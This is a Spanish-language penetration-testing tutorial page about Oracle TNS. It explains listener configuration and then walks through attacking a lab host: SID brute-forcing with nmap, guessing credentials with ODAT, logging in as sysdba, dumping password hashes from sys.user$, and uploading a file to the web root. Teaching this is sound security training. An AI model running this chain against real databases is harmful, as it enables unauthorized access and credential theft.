Oracle TNS

El servidor Oracle Transparent Network Substrate (TNS) es un protocolo de comunicación que facilita la comunicación entre bases de datos y aplicaciones Oracle a través de redes. Introducido inicialmente como parte del paquete de software Oracle Net Services, TNS admite varios protocolos de red entre bases de datos Oracle y aplicaciones cliente, como las pilas de protocolos IPX/SPX y TCP/IP. Como resultado, se ha convertido en la solución preferida para gestionar bases de datos grandes y complejas en los sectores sanitario, financiero y minorista. Además, su mecanismo de cifrado integrado garantiza la seguridad de los datos transmitidos, lo que lo convierte en una solución ideal para entornos empresariales en los que la seguridad de los datos es primordial.

Tnsnames.ora

ORCL =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
    )
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = orcl)
    )
  )

Listener.ora

SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC =
      (SID_NAME = PDB1)
      (ORACLE_HOME = C:\oracle\product\19.0.0\dbhome_1)
      (GLOBAL_DBNAME = PDB1)
      (SID_DIRECTORY_LIST =
        (SID_DIRECTORY =
          (DIRECTORY_TYPE = TNS_ADMIN)
          (DIRECTORY = C:\oracle\product\19.0.0\dbhome_1\network\admin)
        )
      )
    )
  )

LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

ADR_BASE_LISTENER = C:\oracle

Configuración

Descripción

DESCRIPTION

Un descriptor que proporciona un nombre para la base de datos y su tipo de conexión.

ADDRESS

La dirección de red de la base de datos, que incluye el nombre de host y el número de puerto.

PROTOCOL

El protocolo de red utilizado para la comunicación con el servidor.

PORT

El número de puerto utilizado para la comunicación con el servidor.

CONNECT_DATA

Especifica los atributos de la conexión, como el nombre del servicio o SID, el protocolo y el identificador de instancia de la base de datos.

INSTANCE_NAME

El nombre de la instancia de base de datos a la que el cliente desea conectarse.

SERVICE_NAME

El nombre del servicio al que el cliente desea conectarse.

SERVER

El tipo de servidor utilizado para la conexión de la base de datos, como dedicado o compartido.

USER

El nombre de usuario utilizado para autenticarse con el servidor de base de datos.

PASSWORD

La contraseña utilizada para autenticarse con el servidor de base de datos.

SECURITY

El tipo de seguridad para la conexión.

VALIDATE_CERT

Si se valida el certificado mediante SSL/TLS.

SSL_VERSION

La versión de SSL/TLS que se utilizará para la conexión.

CONNECT_TIMEOUT

El límite de tiempo en segundos para que el cliente establezca una conexión a la base de datos.

RECEIVE_TIMEOUT

El límite de tiempo en segundos para que el cliente reciba una respuesta de la base de datos.

SEND_TIMEOUT

El límite de tiempo en segundos para que el cliente envíe una solicitud a la base de datos.

SQLNET.EXPIRE_TIME

El límite de tiempo en segundos para que el cliente detecte una conexión ha fallado.

TRACE_LEVEL

El nivel de seguimiento de la conexión de la base de datos.

TRACE_DIRECTORY

El directorio donde se almacenan los archivos de seguimiento.

TRACE_FILE_NAME

El nombre del archivo de seguimiento.

LOG_FILE

El archivo donde se almacena la información del registro.

Oracle-Tools-setup.sh

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

Testing ODAT

./odat.py -h

usage: odat.py [-h] [--version]
               {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
               ...

            _  __   _  ___ 
           / \|  \ / \|_ _|
          ( o ) o ) o || | 
           \_/|__/|_n_||_| 
-------------------------------------------
  _        __           _           ___ 
 / \      |  \         / \         |_ _|
( o )       o )         o |         | | 
 \_/racle |__/atabase |_n_|ttacking |_|ool 
-------------------------------------------

By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
...SNIP...

Nmap

sudo nmap -p1521 -sV 10.129.204.235 --open

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 10:59 EST
Nmap scan report for 10.129.204.235
Host is up (0.0041s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds

Nmap - SID Bruteforcing

sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 11:01 EST
Nmap scan report for 10.129.204.235
Host is up (0.0044s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
| oracle-sid-brute: 
|_  XE

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.40 seconds

ODAT

./odat.py all -s 10.129.204.235

[+] Checking if target 10.129.204.235:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.204.235:1521 is well configured. Continue...

...SNIP...

[!] Notice: 'mdsys' account is locked, so skipping this username for password           #####################| ETA:  00:01:16 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password       #####################| ETA:  00:01:05 
[!] Notice: 'outln' account is locked, so skipping this username for password           #####################| ETA:  00:00:59
[+] Valid credentials found: scott/tiger. Continue...

...SNIP...

SQLplus - Log In

sqlplus scott/tiger@10.129.204.235/XE

SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023
Version 21.4.0.0.0

Copyright (c) 1982, 2021, Oracle. All rights reserved.

ERROR:
ORA-28002: the password will expire within 7 days



Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL>

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig

SQL> select table_name from all_tables;

TABLE_NAME
------------------------------
DUAL
SYSTEM_PRIVILEGE_MAP
TABLE_PRIVILEGE_MAP
STMT_AUDIT_OPTION_MAP
AUDIT_ACTIONS
WRR$_REPLAY_CALL_FILTER
HS_BULKLOAD_VIEW_OBJ
HS$_PARALLEL_METADATA
HS_PARTITION_COL_NAME
HS_PARTITION_COL_TYPE
HELP

...SNIP...


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Oracle RDBMS - Database Enumeration

sqlplus scott/tiger@10.129.204.235/XE as sysdba

SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:32:58 2023
Version 21.4.0.0.0

Copyright (c) 1982, 2021, Oracle. All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
...SNIP...

Oracle RDBMS - Extract Password Hashes

SQL> select name, password from sys.user$;

NAME                           PASSWORD
------------------------------ ------------------------------
SYS                            FBA343E7D6C8BC9D
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM                         B5073FE1DE351687
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
OUTLN                          4A3BA55E08595C81
EXP_FULL_DATABASE

NAME                           PASSWORD
------------------------------ ------------------------------
IMP_FULL_DATABASE
LOGSTDBY_ADMINISTRATOR
...SNIP...

Path

Linux

/var/www/html

Windows

C:\inetpub\wwwroot

Oracle RDBMS - File Upload

echo "Oracle File Upload Test" > testing.txt

./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

[1] (10.129.204.235:1521): Put the ./testing.txt local file in the C:\inetpub\wwwroot folder like testing.txt on the 10.129.204.235 server                                                                                                  
[+] The ./testing.txt file was created on the C:\inetpub\wwwroot directory on the 10.129.204.235 server like the testing.txt file

curl -X GET http://10.129.204.235/testing.txt

Oracle File Upload Test

AnteriorMSSQL SiguienteIPMI

Última actualización hace 10 meses

ORCL = (DESCRIPTION = (ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521)) ) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = orcl) ) )

SID_LIST_LISTENER = (SID_LIST = (SID_DESC = (SID_NAME = PDB1) (ORACLE_HOME = C:\oracle\product\19.0.0\dbhome_1) (GLOBAL_DBNAME = PDB1) (SID_DIRECTORY_LIST = (SID_DIRECTORY = (DIRECTORY_TYPE = TNS_ADMIN) (DIRECTORY = C:\oracle\product\19.0.0\dbhome_1\network\admin) ) ) ) ) LISTENER = (DESCRIPTION_LIST = (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521)) (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521)) ) ) ADR_BASE_LISTENER = C:\oracle

#!/bin/bash sudo apt-get install libaio1 python3-dev alien -y git clone https://github.com/quentinhardy/odat.git cd odat/ git submodule init git submodule update wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH export PATH=$LD_LIBRARY_PATH:$PATH pip3 install cx_Oracle sudo apt-get install python3-scapy -y sudo pip3 install colorlog termcolor passlib python-libnmap sudo apt-get install build-essential libgmp-dev -y pip3 install pycryptodome

./odat.py -h usage: odat.py [-h] [--version] {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean} ... _ __ _ ___ / \| \ / \|_ _| ( o ) o ) o || | \_/|__/|_n_||_| ------------------------------------------- _ __ _ ___ / \ | \ / \ |_ _| ( o ) o ) o | | | \_/racle |__/atabase |_n_|ttacking |_|ool ------------------------------------------- By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com) ...SNIP...

sudo nmap -p1521 -sV 10.129.204.235 --open Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 10:59 EST Nmap scan report for 10.129.204.235 Host is up (0.0041s latency). PORT STATE SERVICE VERSION 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds

sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 11:01 EST Nmap scan report for 10.129.204.235 Host is up (0.0044s latency). PORT STATE SERVICE VERSION 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) | oracle-sid-brute: |_ XE Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.40 seconds

./odat.py all -s 10.129.204.235 [+] Checking if target 10.129.204.235:1521 is well configured for a connection... [+] According to a test, the TNS listener 10.129.204.235:1521 is well configured. Continue... ...SNIP... [!] Notice: 'mdsys' account is locked, so skipping this username for password #####################| ETA: 00:01:16 [!] Notice: 'oracle_ocm' account is locked, so skipping this username for password #####################| ETA: 00:01:05 [!] Notice: 'outln' account is locked, so skipping this username for password #####################| ETA: 00:00:59 [+] Valid credentials found: scott/tiger. Continue... ...SNIP...

sqlplus scott/tiger@10.129.204.235/XE SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023 Version 21.4.0.0.0 Copyright (c) 1982, 2021, Oracle. All rights reserved. ERROR: ORA-28002: the password will expire within 7 days Connected to: Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production SQL>

SQL> select table_name from all_tables; TABLE_NAME ------------------------------ DUAL SYSTEM_PRIVILEGE_MAP TABLE_PRIVILEGE_MAP STMT_AUDIT_OPTION_MAP AUDIT_ACTIONS WRR$_REPLAY_CALL_FILTER HS_BULKLOAD_VIEW_OBJ HS$_PARALLEL_METADATA HS_PARTITION_COL_NAME HS_PARTITION_COL_TYPE HELP ...SNIP... SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SCOTT CONNECT NO YES NO SCOTT RESOURCE NO YES NO

sqlplus scott/tiger@10.129.204.235/XE as sysdba SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:32:58 2023 Version 21.4.0.0.0 Copyright (c) 1982, 2021, Oracle. All rights reserved. Connected to: Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO SYS APEX_ADMINISTRATOR_ROLE YES YES NO SYS AQ_ADMINISTRATOR_ROLE YES YES NO SYS AQ_USER_ROLE YES YES NO SYS AUTHENTICATEDUSER YES YES NO SYS CONNECT YES YES NO SYS CTXAPP YES YES NO SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO SYS DBA YES YES NO SYS DBFS_ROLE YES YES NO USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYS DELETE_CATALOG_ROLE YES YES NO SYS EXECUTE_CATALOG_ROLE YES YES NO ...SNIP...

SQL> select name, password from sys.user$; NAME PASSWORD ------------------------------ ------------------------------ SYS FBA343E7D6C8BC9D PUBLIC CONNECT RESOURCE DBA SYSTEM B5073FE1DE351687 SELECT_CATALOG_ROLE EXECUTE_CATALOG_ROLE DELETE_CATALOG_ROLE OUTLN 4A3BA55E08595C81 EXP_FULL_DATABASE NAME PASSWORD ------------------------------ ------------------------------ IMP_FULL_DATABASE LOGSTDBY_ADMINISTRATOR ...SNIP...

./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt [1] (10.129.204.235:1521): Put the ./testing.txt local file in the C:\inetpub\wwwroot folder like testing.txt on the 10.129.204.235 server [+] The ./testing.txt file was created on the C:\inetpub\wwwroot directory on the 10.129.204.235 server like the testing.txt file